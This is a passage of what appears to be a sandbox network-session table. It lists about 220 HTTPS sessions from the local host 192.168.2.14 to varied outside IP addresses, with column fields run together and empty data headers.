                                      10336192.168.2.1450354139.170.28.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10337192.168.2.145160248.23.10.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10338192.168.2.144632097.172.204.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10339192.168.2.1451476222.153.158.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10340192.168.2.1440330184.0.188.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10341192.168.2.145532041.36.224.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10342192.168.2.1450384185.18.30.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10343192.168.2.1435932161.163.222.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10344192.168.2.143912852.81.150.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10345192.168.2.1456306206.16.14.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10346192.168.2.1451866195.211.225.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10347192.168.2.1450184122.51.79.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10348192.168.2.1449950193.72.131.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10349192.168.2.143878643.217.74.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10350192.168.2.1440958130.103.193.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10351192.168.2.145429238.34.156.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10352192.168.2.145347476.143.56.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10353192.168.2.144558482.95.243.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10354192.168.2.144022287.148.72.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10355192.168.2.1437476203.113.221.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10356192.168.2.14360609.242.201.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10357192.168.2.1442180165.165.199.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10358192.168.2.1460770163.28.62.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10359192.168.2.1460106190.11.84.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10360192.168.2.1453078175.54.238.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10361192.168.2.144512293.67.3.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10362192.168.2.146046238.218.65.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10363192.168.2.14489569.18.129.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10364192.168.2.1436488207.71.211.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10365192.168.2.1453270218.229.132.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10366192.168.2.1458464145.142.74.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10367192.168.2.145509282.49.38.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10368192.168.2.1450362138.69.163.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10369192.168.2.144791287.129.187.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10370192.168.2.143906259.89.175.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10371192.168.2.145220032.132.184.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10372192.168.2.1447942143.26.208.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10373192.168.2.1439798182.44.59.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10374192.168.2.144589461.45.124.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10375192.168.2.1452344123.143.97.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10376192.168.2.1454376165.73.130.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10377192.168.2.144573061.89.160.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10378192.168.2.1454868180.140.164.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10379192.168.2.1447218164.98.122.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10380192.168.2.1453658206.144.60.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10381192.168.2.144843468.56.5.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10382192.168.2.1457382119.28.178.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10383192.168.2.1442858191.76.44.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10384192.168.2.1458480107.142.166.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10385192.168.2.143420842.223.53.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10386192.168.2.1443644159.63.120.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10387192.168.2.1457996155.152.203.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10388192.168.2.145371053.143.176.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10389192.168.2.144857899.126.199.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10390192.168.2.144537686.54.227.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10391192.168.2.1436194184.147.51.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10392192.168.2.1436370117.182.93.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10393192.168.2.144965045.111.147.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10394192.168.2.143995673.231.6.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10395192.168.2.1447594222.127.129.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10396192.168.2.1440422189.234.227.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10397192.168.2.1460712106.24.184.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10398192.168.2.144090482.236.228.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10399192.168.2.145978080.139.195.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10400192.168.2.145374064.91.232.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10401192.168.2.1441166186.12.205.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10402192.168.2.1460176195.115.57.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10403192.168.2.1452540204.98.154.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10404192.168.2.1433320193.75.12.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10405192.168.2.144141642.13.29.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10406192.168.2.1438312188.87.183.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10407192.168.2.144739284.4.204.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10408192.168.2.143673477.163.22.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10409192.168.2.1449860129.207.229.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10410192.168.2.1451388206.202.73.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10411192.168.2.1455376115.56.121.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10412192.168.2.1446432169.109.152.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10413192.168.2.144380618.117.24.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10414192.168.2.14504208.6.17.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10415192.168.2.1457466121.185.179.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10416192.168.2.1444570138.221.80.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10417192.168.2.14464025.62.175.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10418192.168.2.1439672119.97.17.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10419192.168.2.145256085.76.69.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10420192.168.2.144371880.240.21.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10421192.168.2.144154677.199.202.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10422192.168.2.1440322207.250.138.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10423192.168.2.1452888140.149.104.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10424192.168.2.1440648153.183.219.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10425192.168.2.145314857.224.216.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10426192.168.2.1437122150.80.253.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10427192.168.2.1458348102.107.131.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10428192.168.2.145829499.54.85.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10429192.168.2.143538832.186.115.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10430192.168.2.1435664123.31.123.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10431192.168.2.1436892165.77.78.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10432192.168.2.1439118150.11.208.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10433192.168.2.144882414.112.252.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10434192.168.2.1456192199.30.188.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10435192.168.2.145920444.141.214.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10436192.168.2.1446578147.160.59.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10437192.168.2.143440683.62.26.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10438192.168.2.143776472.130.46.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10439192.168.2.143750286.163.10.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10440192.168.2.1453410112.250.41.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10441192.168.2.144587031.15.228.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10442192.168.2.1441774150.35.118.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10443192.168.2.1434576165.132.186.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10444192.168.2.143578675.12.55.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10445192.168.2.1441792210.9.122.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10446192.168.2.1460170220.143.94.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10447192.168.2.146031872.175.21.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10448192.168.2.1435292151.115.81.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10449192.168.2.1444246130.247.209.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10450192.168.2.1443516129.189.247.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10451192.168.2.143734485.253.151.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10452192.168.2.145760227.157.249.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10453192.168.2.1437702211.172.82.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10454192.168.2.14442341.138.23.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10455192.168.2.143454836.8.9.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10456192.168.2.1444668104.172.160.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10457192.168.2.1445006213.164.214.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10458192.168.2.1455030171.123.191.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10459192.168.2.143425840.134.228.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10460192.168.2.1439632190.22.176.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10461192.168.2.144440232.45.97.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10462192.168.2.1446318124.16.0.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10463192.168.2.1444570141.58.141.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10464192.168.2.1447538129.34.101.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10465192.168.2.1457362185.84.221.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10466192.168.2.145924052.231.49.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10467192.168.2.1458084175.93.132.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10468192.168.2.1451444155.105.184.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10469192.168.2.145832462.9.17.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10470192.168.2.1434116136.176.215.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10471192.168.2.144439245.133.205.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10472192.168.2.1455794222.32.2.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10473192.168.2.1441068168.217.47.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10474192.168.2.144123844.88.218.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10475192.168.2.1456552129.30.69.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10476192.168.2.144895468.247.122.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10477192.168.2.1440906152.42.219.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10478192.168.2.144848241.150.118.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10479192.168.2.1435152122.25.94.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10480192.168.2.1447298150.137.238.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10481192.168.2.1433448124.121.8.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10482192.168.2.1458602182.160.81.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10483192.168.2.145006843.52.64.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10484192.168.2.145408263.10.171.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10485192.168.2.1457120137.93.204.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10486192.168.2.1437376182.89.165.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10487192.168.2.143659094.16.58.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10488192.168.2.1437816124.0.229.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10489192.168.2.1455776207.80.115.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10490192.168.2.1442336196.30.107.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10491192.168.2.143355498.168.63.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10492192.168.2.1434746107.84.217.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10493192.168.2.144853262.8.205.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10494192.168.2.1455718176.57.58.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10495192.168.2.1456890107.66.124.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10496192.168.2.144394043.76.48.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10497192.168.2.14354742.170.24.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10498192.168.2.1434132196.1.249.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10499192.168.2.1452594157.182.198.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10500192.168.2.143536479.248.232.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10501192.168.2.1447514145.1.96.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10502192.168.2.144699058.157.195.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10503192.168.2.144006444.70.119.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10504192.168.2.144129263.214.66.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10505192.168.2.1437054166.18.244.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10506192.168.2.143314292.52.249.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10507192.168.2.144551041.104.132.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10508192.168.2.143579686.39.119.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10509192.168.2.1438256109.235.6.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10510192.168.2.1441548106.54.235.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10511192.168.2.143756619.60.40.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10512192.168.2.1446076121.151.114.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10513192.168.2.145639645.110.142.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10514192.168.2.144567095.123.58.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10515192.168.2.1452546219.75.123.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10516192.168.2.1437694133.230.15.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10517192.168.2.1458970111.125.246.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10518192.168.2.1459454210.245.9.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10519192.168.2.1460010115.194.142.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10520192.168.2.144220677.56.84.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10521192.168.2.1450000213.227.93.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10522192.168.2.1447740172.131.80.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10523192.168.2.145636059.183.112.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10524192.168.2.1454116211.170.238.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10525192.168.2.1441738187.213.162.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10526192.168.2.1441630177.129.129.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10527192.168.2.1453274122.211.167.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10528192.168.2.145133454.128.40.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10529192.168.2.145063695.103.102.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10530192.168.2.145891040.101.121.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10531192.168.2.143626270.251.11.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10532192.168.2.1438770108.128.105.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10533192.168.2.146011652.244.184.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10534192.168.2.144551887.11.80.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10535192.168.2.1459098203.35.206.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10536192.168.2.144245044.80.83.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10537192.168.2.1437392113.95.228.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10538192.168.2.1437834189.251.96.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10539192.168.2.144309274.160.196.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10540192.168.2.1450146143.101.103.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10541192.168.2.1450778174.253.212.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10542192.168.2.145971835.252.50.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10543192.168.2.146004853.96.43.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10544192.168.2.1439956212.222.56.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10545192.168.2.1452452163.168.93.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10546192.168.2.145505296.37.37.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10547192.168.2.1460476139.197.7.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10548192.168.2.1458378174.104.7.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10549192.168.2.1454644144.251.126.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10550192.168.2.1452362135.183.146.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10551192.168.2.145854081.53.205.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10552192.168.2.1451292169.234.66.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10553192.168.2.1452344209.172.116.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10554192.168.2.1456000108.221.125.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10555192.168.2.1433032121.87.64.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10556192.168.2.144862632.250.239.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10557192.168.2.1454092106.144.200.169443
                                      TimestampBytes transferredDirectionData


